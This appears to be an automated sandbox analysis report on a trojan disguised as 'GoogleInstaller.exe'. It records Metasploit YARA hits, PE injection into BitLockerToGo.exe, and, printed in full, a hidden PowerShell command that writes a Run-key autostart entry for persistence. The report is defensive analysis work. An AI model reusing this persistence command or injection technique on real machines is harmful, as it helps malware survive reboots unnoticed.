    Source: powershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: GoogleInstaller.exeString found in binary or memory: https://protobuf.dev/reference/go/faq#namespace-conflictduration

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 00000000.00000002.2377337169.0000000003D7E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
    Source: 00000000.00000002.2377337169.0000000006348000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
    Source: 00000000.00000002.2377337169.0000000005364000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
    Source: GoogleInstaller.exe, 00000000.00000000.2167196727.0000000001F01000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameGoogle Installer.exeD" vs GoogleInstaller.exe
    Source: GoogleInstaller.exe, 00000000.00000002.2374528063.0000000002CB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs GoogleInstaller.exe
    Source: GoogleInstaller.exeBinary or memory string: OriginalFilenameGoogle Installer.exeD" vs GoogleInstaller.exe
    Source: GoogleInstaller.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000002.2377337169.0000000003D7E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
    Source: 00000000.00000002.2377337169.0000000006348000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
    Source: 00000000.00000002.2377337169.0000000005364000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
    Source: GoogleInstaller.exeBinary string: [0m[%s]%s %-44s Buffer called after ScanAllocateAndInitializeSidBuildSecurityDescriptorWAssignProcessToJobObjectGenerateConsoleCtrlEventGetMaximumProcessorCountGetNamedPipeHandleStateWSetConsoleCursorPositionSetDefaultDllDirectoriesNtQuerySystemInformationSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDeviceGetWindowThreadProcessIdcould not resolve %q: %vMon Jan _2 15:04:05 20062006-01-02T15:04:05Z0700x509: malformed validityexec: Stdout already setexec: Stderr already setjson: unsupported type: \Device\NamedPipe\cygwininvalid field number: %dmismatching enum lengthsapplication/octet-streamRequest Entity Too Largeinvalid pattern syntax: address string too shortresource length too longunpacking Question.Classunable to resolve %s: %vunable to resolve %v: %qgoogle.protobuf.Durationidna: disallowed rune %UstreamSafe was not resetresource deadlock avoidedoperation now in progressno buffer space availableno such device or addresssocket type not supportedinvalid cross-device linkGetFinalPathNameByHandleWGetQueuedCompletionStatusUpdateProcThreadAttributeSouth Sudan Standard TimeUS Mountain Standard TimeMiddle East Standard TimeTransbaikal Standard TimeW. Mongolia Standard TimeAfghanistan Standard TimeNorth Korea Standard TimeUlaanbaatar Standard TimeVladivostok Standard TimeAUS Central Standard TimeAUS Eastern Standard TimeKaliningrad Standard TimeNew Zealand Standard Time2006-01-02T15:04:05Z07:00SliceType.Grow argument 1number of sections is 10+LPSAFEARRAY_UserUnmarshalGetRecordInfoFromTypeInfoarray index out of bounds!#$%&'()-@^_`{}~+,.;=[]\/ARM Thumb-2 little endianMIPS little-endian WCE v2Chinese (Simplified) (zh)Mongolian (Cyrillic) (mn)Bangla Bangladesh (bn-BD)Bosnian (Latin) (bs-Latn)Central Kurdish (ku-Arab)Dari Afghanistan (prs-AF)Dutch Netherlands (nl-NL)English Australia (en-AU)English Hong Kong (en-HK)English Singapore (en-SG)French Caribbean (fr-029)French Congo, Drc (fr-CD)French Luxembourg (fr-LU)German Luxembourg (de-LU)Hungarian Hungary (hu-HU)Icelandic Iceland (is-IS)Kazakh Kazakhstan (kk-KZ)Kyrgyz Kyrgyzstan (ky-KG)Maori New Zealand (mi-NZ)Mapudungun Chile (arn-CL)Portuguese Brazil (pt-BR)Serbian (Latin) (sr-Latn)Setswana Botswana (tn-BW)Sinhala Sri Lanka (si-LK)Spanish Argentina (es-AR)Spanish Guatemala (es-GT)Spanish Nicaragua (es-NI)Tigrinya Ethiopia (ti-ET)Ukrainian Ukraine (uk-UA)Zulu South Africa (zu-ZA)` Contents are null-bytesgoroutine profile cleanupchansend: spurious wakeupruntime
    Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@1/3
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\configJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4232:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxwq2z0d.deo.ps1Jump to behavior
    Source: GoogleInstaller.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\GoogleInstaller.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: GoogleInstaller.exeReversingLabs: Detection: 13%
    Source: GoogleInstaller.exeString found in binary or memory: net/addrselect.go
    Source: GoogleInstaller.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
    Source: C:\Users\user\Desktop\GoogleInstaller.exeFile read: C:\Users\user\Desktop\GoogleInstaller.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\GoogleInstaller.exe "C:\Users\user\Desktop\GoogleInstaller.exe"
    Source: C:\Users\user\Desktop\GoogleInstaller.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Users\user\Desktop\GoogleInstaller.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"Jump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeSection loaded: pdh.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: GoogleInstaller.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: GoogleInstaller.exeStatic file information: File size 17015808 > 1048576
    Source: GoogleInstaller.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3e9600
    Source: GoogleInstaller.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xbb0000
    Source: GoogleInstaller.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: BitLockerToGo.pdb source: GoogleInstaller.exe, 00000000.00000002.2374528063.0000000002CB8000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: BitLockerToGo.pdbGCTL source: GoogleInstaller.exe, 00000000.00000002.2374528063.0000000002CB8000.00000004.00001000.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Suspicious powershell command line found
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"Jump to behavior
    Source: GoogleInstaller.exeStatic PE information: section name: .symtab
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E46D4C pushad ; iretd 6_2_04E46D4D

    Boot Survival

    barindex
    Creates an autostart registry key pointing to binary in C:\Windows
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppJump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2275Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 669Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1016Thread sleep count: 2275 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4540Thread sleep count: 669 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3472Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5348Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4460Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: BitLockerToGo.exe, 00000002.00000002.4016440694.00000000033F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: GoogleInstaller.exe, 00000000.00000002.2372452613.000000000242C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxx
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Allocates memory in foreign processes
    Source: C:\Users\user\Desktop\GoogleInstaller.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A80000 protect: page execute and read and writeJump to behavior
    Injects a PE file into a foreign processes
    Source: C:\Users\user\Desktop\GoogleInstaller.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A80000 value starts with: 4D5AJump to behavior
    Writes to foreign memory regions
    Source: C:\Users\user\Desktop\GoogleInstaller.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 675008Jump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A80000Jump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A81000Jump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2F6B000Jump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3217000Jump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 327A000Jump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 327B000Jump to behavior
